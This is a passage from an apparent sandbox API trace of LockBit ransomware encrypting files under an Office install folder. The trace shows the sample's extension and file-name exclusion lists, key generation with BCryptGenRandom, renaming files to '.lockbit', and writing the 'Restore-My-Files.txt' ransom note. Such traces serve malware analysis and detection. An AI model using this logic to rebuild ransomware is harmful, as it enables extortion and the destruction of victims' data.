lstrcmpiW (lpString1=".msc", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".spl", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".ps1", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".msu", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".ics", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".key", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".mp3", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".reg", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".dll", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".ini", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".idx", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".sys", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".hlp", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".ico", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".lnk", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".rdp", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".lockbit", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BSTORM.VSL") returned 1 [0210.433] lstrcmpiW (lpString1="ntldr", lpString2="BSTORM.VSL") returned 1 [0210.434] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BSTORM.VSL") returned 1 [0210.434] lstrcmpiW (lpString1="bootsect.bak", lpString2="BSTORM.VSL") returned -1 [0210.434] lstrcmpiW (lpString1="autorun.inf", lpString2="BSTORM.VSL") returned -1 [0210.434] lstrcmpiW (lpString1="thumbs.db", lpString2="BSTORM.VSL") returned 1 [0210.434] lstrcmpiW (lpString1="iconcache.db", lpString2="BSTORM.VSL") returned 1 [0210.434] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.434] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned=".VSL" [0210.434] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0210.434] lstrcmpiW (lpString1=".7z", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".ckp", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".dacpac", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".db", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".db-shm", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".db-wal", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".db3", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".dbc", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".dbs", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".dbt", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".dbv", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".frm", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".mdf", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".mrg", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".mwb", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".myd", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".ndf", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".qry", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".sdb", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".sdf", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".sql", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".sqlite", lpString2=".VSL") returned -1 [0210.434] lstrcmpiW (lpString1=".sqlite3", lpString2=".VSL") returned -1 [0210.435] lstrcmpiW (lpString1=".sqlitedb", lpString2=".VSL") returned -1 [0210.435] lstrcmpiW (lpString1=".tmd", lpString2=".VSL") returned -1 [0210.435] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.lockbit") returned 67 [0210.435] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.437] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.437] malloc (_Size=0x40068) returned 0x3df0008 [0210.437] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=45968) returned 1 [0210.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.438] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.442] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.442] malloc (_Size=0x9c) returned 0x1fab0b8 [0210.442] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fab0b8, Length=0x9c, FileInformationClass=0xa) returned 0x0 [0210.444] free (_Block=0x1fab0b8) [0210.444] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.444] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.444] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.444] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d7e200, ftCreationTime.dwHighDateTime=0x1c9c49e, ftLastAccessTime.dwLowDateTime=0x506a3720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe4d7e200, ftLastWriteTime.dwHighDateTime=0x1c9c49e, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BW.CSS", cAlternateFileName="")) returned 1 [0210.444] lstrcmpiW (lpString1=".", lpString2="BW.CSS") returned -1 [0210.444] lstrcmpiW (lpString1="..", lpString2="BW.CSS") returned -1 [0210.444] PathFindExtensionW (pszPath="BW.CSS") returned=".CSS" [0210.444] lstrcmpiW (lpString1=".386", lpString2=".CSS") returned -1 [0210.444] lstrcmpiW (lpString1=".cmd", lpString2=".CSS") returned -1 [0210.444] lstrcmpiW (lpString1=".exe", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".ani", lpString2=".CSS") returned -1 [0210.444] lstrcmpiW (lpString1=".adv", lpString2=".CSS") returned -1 [0210.444] lstrcmpiW (lpString1=".theme", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".msi", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".msp", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".com", lpString2=".CSS") returned -1 [0210.444] lstrcmpiW (lpString1=".diagpkg", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".nls", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".diagcab", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".lock", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".ocx", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".mpa", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".cpl", lpString2=".CSS") returned -1 [0210.444] lstrcmpiW (lpString1=".mod", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".hta", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".icns", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".prf", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".rtp", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".diagcfg", lpString2=".CSS") returned 1 [0210.444] lstrcmpiW (lpString1=".msstyles", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".bin", lpString2=".CSS") returned -1 [0210.445] lstrcmpiW (lpString1=".hlp", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".shs", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".drv", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".wpx", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".bat", lpString2=".CSS") returned -1 [0210.445] lstrcmpiW (lpString1=".rom", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".msc", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".spl", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".ps1", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".msu", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".ics", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".key", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".mp3", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".reg", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".dll", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".ini", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".idx", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".sys", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".hlp", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".ico", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".lnk", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".rdp", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".lockbit", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BW.CSS") returned 1 [0210.445] lstrcmpiW (lpString1="ntldr", lpString2="BW.CSS") returned 1 [0210.445] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BW.CSS") returned 1 [0210.445] lstrcmpiW (lpString1="bootsect.bak", lpString2="BW.CSS") returned -1 [0210.445] lstrcmpiW (lpString1="autorun.inf", lpString2="BW.CSS") returned -1 [0210.445] lstrcmpiW (lpString1="thumbs.db", lpString2="BW.CSS") returned 1 [0210.445] lstrcmpiW (lpString1="iconcache.db", lpString2="BW.CSS") returned 1 [0210.445] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.445] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS") returned=".CSS" [0210.445] lstrcmpiW (lpString1=".rar", lpString2=".CSS") returned 1 [0210.445] lstrcmpiW (lpString1=".zip", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".7z", lpString2=".CSS") returned -1 [0210.446] lstrcmpiW (lpString1=".ckp", lpString2=".CSS") returned -1 [0210.446] lstrcmpiW (lpString1=".dacpac", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".db", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".db-shm", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".db-wal", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".db3", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".dbf", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".dbc", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".dbs", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".dbt", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".dbv", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".frm", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".mdf", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".mrg", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".mwb", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".myd", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".ndf", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".qry", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".sdb", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".sdf", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".sql", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".sqlite", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".sqlite3", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".sqlitedb", lpString2=".CSS") returned 1 [0210.446] lstrcmpiW (lpString1=".tmd", lpString2=".CSS") returned 1 [0210.446] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS.lockbit") returned 63 [0210.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bw.css"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.448] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.448] malloc (_Size=0x40068) returned 0x3df0008 [0210.448] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3450) returned 1 [0210.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.449] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.454] malloc (_Size=0x94) returned 0x2073f40 [0210.454] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x94, FileInformationClass=0xa) returned 0xc0000008 [0210.454] free (_Block=0x2073f40) [0210.454] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.454] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.454] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb09b400, ftCreationTime.dwHighDateTime=0x1c55530, ftLastAccessTime.dwLowDateTime=0x506a3720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xeb09b400, ftLastWriteTime.dwHighDateTime=0x1c55530, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0x0, dwReserved1=0x0, cFileName="CALEVENT.VRD", cAlternateFileName="")) returned 1 [0210.454] lstrcmpiW (lpString1=".", lpString2="CALEVENT.VRD") returned -1 [0210.454] lstrcmpiW (lpString1="..", lpString2="CALEVENT.VRD") returned -1 [0210.454] PathFindExtensionW (pszPath="CALEVENT.VRD") returned=".VRD" [0210.454] lstrcmpiW (lpString1=".386", lpString2=".VRD") returned -1 [0210.454] lstrcmpiW (lpString1=".cmd", lpString2=".VRD") returned -1 [0210.454] lstrcmpiW (lpString1=".exe", lpString2=".VRD") returned -1 [0210.454] lstrcmpiW (lpString1=".ani", lpString2=".VRD") returned -1 [0210.454] lstrcmpiW (lpString1=".adv", lpString2=".VRD") returned -1 [0210.454] lstrcmpiW (lpString1=".theme", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".msi", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".msp", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".com", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".diagpkg", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".nls", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".diagcab", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".lock", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".ocx", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".mpa", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".cpl", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".mod", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".hta", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".icns", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".prf", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".rtp", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".diagcfg", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".msstyles", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".bin", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".hlp", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".shs", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".drv", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".wpx", lpString2=".VRD") returned 1 [0210.455] lstrcmpiW (lpString1=".bat", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".rom", lpString2=".VRD") returned -1 [0210.455] lstrcmpiW (lpString1=".msc", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".spl", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".ps1", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".msu", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".ics", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".key", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".mp3", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".reg", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".dll", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".ini", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".idx", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".sys", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".hlp", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".ico", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".lnk", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".rdp", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1=".lockbit", lpString2=".VRD") returned -1 [0210.456] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CALEVENT.VRD") returned 1 [0210.456] lstrcmpiW (lpString1="ntldr", lpString2="CALEVENT.VRD") returned 1 [0210.456] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CALEVENT.VRD") returned 1 [0210.456] lstrcmpiW (lpString1="bootsect.bak", lpString2="CALEVENT.VRD") returned -1 [0210.456] lstrcmpiW (lpString1="autorun.inf", lpString2="CALEVENT.VRD") returned -1 [0210.456] lstrcmpiW (lpString1="thumbs.db", lpString2="CALEVENT.VRD") returned 1 [0210.456] lstrcmpiW (lpString1="iconcache.db", lpString2="CALEVENT.VRD") returned 1 [0210.456] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\") returned="" [0210.456] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned=".VRD" [0210.456] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0210.457] lstrcmpiW (lpString1=".7z", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".ckp", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".dacpac", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".db", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".db-shm", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".db-wal", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".db3", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".dbc", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".dbs", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".dbt", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".dbv", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".frm", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".mdf", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".mrg", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".mwb", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".myd", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".ndf", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".qry", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".sdb", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".sdf", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".sql", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".sqlite", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".sqlite3", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".sqlitedb", lpString2=".VRD") returned -1 [0210.457] lstrcmpiW (lpString1=".tmd", lpString2=".VRD") returned -1 [0210.457] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.lockbit") returned 69 [0210.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.460] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.460] malloc (_Size=0x40068) returned 0x3df0008 [0210.460] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2144) returned 1 [0210.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.461] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.465] malloc (_Size=0xa0) returned 0x1fab0b8 [0210.465] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fab0b8, Length=0xa0, FileInformationClass=0xa) returned 0xc0000008 [0210.465] free (_Block=0x1fab0b8) [0210.465] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.465] wsprintfW (in: param_1=0x3d6b4a0, 